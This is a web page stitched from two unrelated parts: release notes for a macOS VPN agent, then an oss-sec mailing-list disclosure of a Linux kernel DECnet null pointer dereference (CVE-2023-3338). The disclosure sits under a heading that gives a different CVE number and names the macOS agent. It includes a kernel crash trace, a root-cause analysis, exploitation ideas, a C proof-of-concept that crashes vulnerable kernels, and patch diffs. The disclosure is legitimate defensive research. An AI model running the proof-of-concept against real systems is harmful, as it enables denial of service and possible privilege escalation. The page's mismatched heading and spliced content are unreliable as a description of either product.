*   P81-5385 - Crash on changing networks while OpenVPN connected on TWN
*   P81-5332 - Post connection loss authentication issue
*   P81-4796 - Correction of description for Automatic Protocol
*   P81-4764 - Agent stuck in reconnecting when coming out of sleep mode
*   P81-4368 - Agent stuck in Reconnecting state

New features:

*   P81-5029 - Improve the output message after "Automatically log out Client "
*   P81-5026 - Remove "contact support" suggestion when failing DPC
*   P81-5034 - Rename "diagnose issues" button
*   P81-4699 - Compatibility with MacOS 12.0 Monterey

**MacOS agent 7.0.3.28**

Fixed issues:

*   P81-3293 - Added latency measurements BI events
*   P81-3312 - Fixed device register issue caused by UDID non-escaping

**MacOS agent 7.0.2.21**

Fixed issues:

*   P81-1995 — Device posture check says that disk is not encrypted when it actually is encrypted
*   P81-2021 — Incorrect VPN status on Home screen if Start Minimized=ON and VPN has connected automatically
*   P81-2532 — Agent stuck on reconnecting
*   P81-3111 — DPC failed for all the rules that should pass
*   P81-3179 — App hanging during TWN check processing

**MacOS agent 7.0.2.19**

Fixed issues:

*   P81-2680 — Trusted Wired Networks - Agent user still needs to enter code on Quit/sign out while connected to TWN
*   P81-2198 — User still needs to enter code on Quit/Sign Out while on TWNP81-2198
*   P81-2633 — The Always On Not restored 0n turning Netwotk's toggle if Network above in list is Disabled
*   P81-2231 — Attempt to connect to the VPN is made on setting AlwaysOn by user
*   P81-2199 — No "Connected to Trusted Network" badge on Home screen when computer on TWN
*   P81-2198 — User still needs to enter code on Quit/Sign Out while on TWN
*   P81-2215 — The app connected to VPN on user setting AlwaysOn=ON while connected to TWN
*   P81-2550 — Show appropriate text when hovering over the "Connected to Trusted Network" badge
*   P81-2798 — MacOS P81 DPC: Condition "AND" for "Process Running" doesn't work

**MacOS 7.0.1.12**

*   Silent upgrade feature imlemented

**MacOS 7.0.1.7**

*   Fixed issue when agent app pops up with every ZTA change — P81-1117, P81-1115
*   Fixed wrong Device Name documented in Device Activity — P81-1364
*   Fixed Internal IP Not Defined issue, when VPN get connected — P81-1347
*   Moved Snowplow session cache file outside of the user’s Documents folder — P81-937

**MacOS 7.0.1.6****New features:**

*   Device Posture Check feature implemented

**Resolved Issues:**

*   Fixed app crash issue — P81-726
*   Fixed app re-connect issue when losing WiFi — P81-906
*   Fixed Run on StartUp issue — P81-914
*   Fixed Sign Out” and “Quit” option from doesn’t work if app is not in foreground — P81-1027
*   Fixed app re-login when DPC check has failed — P81-1452
*   Fixed Disconnect/Connect notifications showing — P81-1110
*   Fixed high CPU consumption issue when the app is in background — P81-438
*   Fixed SDP socket re-connect issue after sleep-mode

**MacOS 7.0.0 (7):****Bug fixes:**

*   Application complete re-design, Main view, Settings page, Support page, OnBoarding page
*   Implemented new login flow using default browser with SSO support
*   Implemented accessToken token rotation before performing Logout call -- #MAC-1056
*   Added timeout for LoginSucceeded event -- #MAC-1075
*   Added full username showing inside of the Main view (if it’s available) -- #MAC-1083
*   Added support ticket number for the user if it’s available from Troubleshooting -- #MAC-1074
*   Change user’s email address fetching from JWT to channel.OnUpdated data payload -- #MAC-1066
*   Fixed Connection/Reconnection initiated from Connect on Launch can’t be interrupted -- #MAC-1079
*   Fixed Hide Automatic Location from Icon/Dock menus -- #MAC-1086
*   Fixed issue when Admin can’t enforce upgrade to the latest version -- #MAC-942
*   Disable KillSwitch by default for AlwaysON -- #MAC-1081
*   Fixed Sleep/awake re-connect issue -- #MAC-1061
*   Fixed Disconnect button non-responsiveness when agent connecting/reconnecting -- #MAC-1078
*   Fixed expand/collapse Shared Networks issue, when hover stopped to work -- #MAC-1062
*   Fixed issues when “Change Network” button displayed incorrectly when “Upgrade Application” is enforced -- #MAC-1111
*   Added BI events sending support
*   Added osVersion as a part of channel.open payload
*   Implemented automated Troubleshooting script, now avg processing time is ~1 min -- #MAC-1093
*   Fixed “Sign Out” and “Quit” options from notification area context menu when app is in background mode -- #MAC-1100, #MAC-1099
*   Fixed “Automatic Location” network option -- #MAC-1096
*   Added tooltips for SignOut / Exit Settings buttons, Main + OnBoarding windows appear at the same time -- #MAC-1088
*   Fixed “Automatic Location” network option -- #MAC-1096
*   Fixed UI blinking when switching between Home tab and any other -- #MAC-1073
*   Fix network selection logic -- #MAC-1087

Was this article helpful?

CVE-2023-33298: MacOS - Agent

A flaw null pointer dereference in the Linux kernel DECnet networking protocol was found. A remote user could use this flaw to crash the system.

**oss-sec mailing list archives**

_From_: Ornaghi Davide - Betrusted <davide.ornaghi () betrusted it>  
_Date_: Sat, 24 Jun 2023 16:11:36 +0000  

Hi all,



I'm reporting a Null Pointer Dereference vulnerability that I found while attempting to ping localhost by sending a 
Hello message to a local DECnet socket:



\`\`\`
\[45620.986136\] BUG: kernel NULL pointer dereference, address: 0000000000000000
\[45620.986141\] #PF: supervisor read access in kernel mode
\[45620.986143\] #PF: error\_code(0x0000) - not-present page
\[45620.986146\] PGD 0 P4D 0
\[45620.986148\] Oops: 0000 \[#1\] PREEMPT SMP NOPTI
\[45620.986152\] CPU: 6 PID: 37997 Comm: test Tainted: G        W    L    5.19.0-43-generic #44~22.04.1-Ubuntu
\[45620.986155\] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 
11/12/2020
\[45620.986156\] RIP: 0010:dn\_nsp\_send+0x1c9/0x200 \[decnet\]
\[45620.986159\] Code: 74 3e 8d 48 01 f0 0f b1 4a 40 41 0f 94 c6 45 84 f6 74 eb 48 89 d3 49 89 d7 48 83 e3 fe 48 89 55 90 
e8 eb f7 ac c0 48 8b 55 90 <48> 8b 02 48 8b 80 e8 00 00 00 49 89 85 e8 01 00 00 e9 93 fe ff ff
\[45620.986161\] RSP: 0018:ffffc90032abfc90 EFLAGS: 00010246
\[45620.986164\] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
\[45620.986165\] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
\[45620.986166\] RBP: ffffc90032abfd00 R08: 0000000000000000 R09: 0000000000000000
\[45620.986167\] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881aca6f9c0
\[45620.986168\] R13: ffff888118903cc0 R14: 0000000000000000 R15: 0000000000000000
\[45620.986172\] FS:  00007f144e58b740(0000) GS:ffff888339d80000(0000) knlGS:0000000000000000
\[45620.986173\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[45620.986175\] CR2: 0000000000000000 CR3: 0000000226154004 CR4: 0000000000770ee0
\[45620.986185\] PKRU: 55555554
\[45620.986186\] Call Trace:
\[45620.986189\]  <TASK>
\[45620.986191\]  dn\_nsp\_send\_conninit+0x207/0x4c0 \[decnet\]
\[45620.986196\]  \_\_dn\_connect+0x172/0x230 \[decnet\]
\[45620.986220\]  dn\_connect+0x5c/0xa0 \[decnet\]
\[45620.986223\]  \_\_sys\_connect\_file+0x68/0x80
\[45620.986225\]  \_\_sys\_connect+0xb6/0xe0
\[45620.986227\]  ? exit\_to\_user\_mode\_loop+0xf1/0x140
\[45620.986228\]  ? exit\_to\_user\_mode\_prepare+0x3b/0xd0
\[45620.986230\]  ? syscall\_exit\_to\_user\_mode+0x2a/0x50
\[45620.986232\]  ? do\_syscall\_64+0x69/0x90
\[45620.986234\]  \_\_x64\_sys\_connect+0x18/0x30
\[45620.986236\]  do\_syscall\_64+0x59/0x90
\[45620.986237\]  ? exit\_to\_user\_mode\_prepare+0x3b/0xd0
\[45620.986241\]  ? syscall\_exit\_to\_user\_mode+0x2a/0x50
\[45620.986242\]  ? do\_syscall\_64+0x69/0x90
\[45620.986244\]  entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd
\`\`\`

## Bug details

This crash is due to the dn\_nsp\_send function (net/decnet/dn\_nsp\_out.c) which, first off, causes a Denial of Service by 
preventing the release of locks such as the current sock's sk->sk\_lock, but could also lead to Local Privilege 
Escalation under certain conditions.

When first starting a connection with a DECnet socket, the connect() handler \_\_dn\_connect, while building a route, ends 
up calling dst\_alloc (net/decnet/dn\_route.c:1178) which initializes the dst reference counter to 0 instead of 1 (see 
commit 76371d2e3ad1f84426a30ebcd8c3b9b98f4c724f for an explanation).
Later on, dn\_insert\_route is expected to increase the dst refcount, but in reality, it fails to do so, since 
dst\_hold\_and\_use (net/decnet/dn\_route.c:347) actually calls atomic\_inc\_not\_zero on dst->\_\_refcnt, which only works if 
the refcount is not 0. While the refcount hasn't changed, the dst->\_use counter is correctly incremented by 
dst\_use\_noref.

\`\`\`c
static inline void dst\_hold(struct dst\_entry \*dst)
{
    BUILD\_BUG\_ON(offsetof(struct dst\_entry, \_\_refcnt) & 63);
    WARN\_ON(atomic\_inc\_not\_zero(&dst->\_\_refcnt) == 0);            <===
}
\`\`\`

Therefore, a warning gets thrown.
As a consequence, all the following sk\_dst\_get(sk) calls will return NULL since this function also uses 
atomic\_inc\_not\_zero, and returns NULL on failure.
This condition leads to a NPD at net/decnet/dn\_nsp\_out.c:92:

\`\`\`c
if (dn\_route\_output\_sock(&sk->sk\_dst\_cache, &fld, sk, 0) == 0) {
    dst = sk\_dst\_get(sk);
    sk->sk\_route\_caps = dst->dev->features;                        <===   dst is NULL
    goto try\_again;
}
\`\`\`

## Exploitation scenarios

Furthermore, the try\_again label redirects the execution to the following code:

\`\`\`c
if (dst) {
    try\_again:
    skb\_dst\_set(skb, dst);
    dst\_output(&init\_net, skb->sk, skb);        <===
    return;
}
\`\`\`

where the dst->output() function is invoked by dst\_output to send the outgoing packet after the routing decision. In an 
attacker's ideal conditions, where the zero page is mappable, this allows arbitrary code execution.

In more modern systems, the previous scenario can be triggered multiple times to possibly control other reference 
counters and thus trigger further vulnerabilities such as UAF.
For instance, one could force the sock->file (from \_\_sys\_sendto) refcount to wrap around and eventually free it, though 
a definitive exploitation technique is still under study.

## Vulnerable versions

Linux kernels with DECnet support from Linux-4.12-rc7 (commit 76371d2e3ad1f84426a30ebcd8c3b9b98f4c724f) up to 
Linux-6.0.19.
The said subsystem has been removed during the 6.1 merge window because deprecated.

## Proof-of-Concept

The kernel has to be compiled with CONFIG\_DECNET=y and should have a DECnet address assigned (echo -n "1.10" > 
/proc/sys/net/decnet/node\_address):

\`\`\`c
int main() {
    int sockfd;

    if ((sockfd = socket(AF\_DECnet, SOCK\_SEQPACKET, DNPROTO\_NSP)) == -1) {
        perror("socket");
        exit(-1);
    }
    struct sockaddr\_dn sockaddr;
    struct nodeent dp;
    static struct dn\_naddr addr;
    char \*nodename = "turtle";
    addr.a\_addr\[0\] = 10 & 0xFF;
    addr.a\_addr\[1\] = (1 << 2) | ((10 & 0x300) >> 8);
    sockaddr.sdn\_family = AF\_DECnet;
    sockaddr.sdn\_flags  = 0x00;
    sockaddr.sdn\_objnum  = DNOBJECT\_MIRROR;
    sockaddr.sdn\_objnamel  = 0x00;

    dp.n\_addr = (unsigned char \*)&addr.a\_addr;
    dp.n\_length = 2;
    dp.n\_name = nodename;
    dp.n\_addrtype = AF\_DECnet;

    if (connect(sockfd, (struct sockaddr \*)&sockaddr, sizeof(sockaddr)) < 0) {
        perror("socket");
        exit(-1);
    }
    return 0;
}
\`\`\`

Writing a PoC that returns a root shell on devices without SMAP and vm.mmap\_min\_addr is also trivial.

## Bug fix

This was my suggested patch:

\`\`\`diff
--- a/net/decnet/dn\_route.c     2023-06-06 15:55:36.615147110 +0200
+++ b/net/decnet/dn\_route.c     2023-06-06 15:56:00.179416949 +0200
@@ -1175,7 +1175,7 @@ make\_route:
        if (dev\_out->flags & IFF\_LOOPBACK)
                flags |= RTCF\_LOCAL;

-       rt = dst\_alloc(&dn\_dst\_ops, dev\_out, 0, DST\_OBSOLETE\_NONE, 0);
+       rt = dst\_alloc(&dn\_dst\_ops, dev\_out, 1, DST\_OBSOLETE\_NONE, 0);
        if (rt == NULL)
                goto e\_nobufs;
\`\`\`

Also, always make sure that dst isn't NULL after sk\_dst\_get:

\`\`\`diff
--- a/net/decnet/dn\_nsp\_out.c   2023-06-06 22:01:57.212802584 +0200
+++ b/net/decnet/dn\_nsp\_out.c   2023-06-06 22:04:37.138709847 +0200
@@ -89,7 +89,9 @@ try\_again:
        fld.flowidn\_proto = DNPROTO\_NSP;
        if (dn\_route\_output\_sock(&sk->sk\_dst\_cache, &fld, sk, 0) == 0) {
                dst = sk\_dst\_get(sk);
-               sk->sk\_route\_caps = dst->dev->features;
+               if (!dst)
+                       return;
+               sk->sk\_route\_caps = dst->dev->features;
                goto try\_again;
        }
\`\`\`

The DECnet subsystem has been officially removed from all longterm and stable kernel series, starting from 4.14.319, 
4.19.287, 5.4.248, 5.10.185 and 5.15.118.

Best regards,

Davide Ornaghi

**Current thread:**

*   **CVE-2023-3338: Linux Kernel NULL Pointer Dereference in DECnet** _Ornaghi Davide - Betrusted (Jun 24)_
    *   Re: CVE-2023-3338: Linux Kernel NULL Pointer Dereference in DECnet _Peter Philip Pettersson (Jun 24)_

Tag

#ios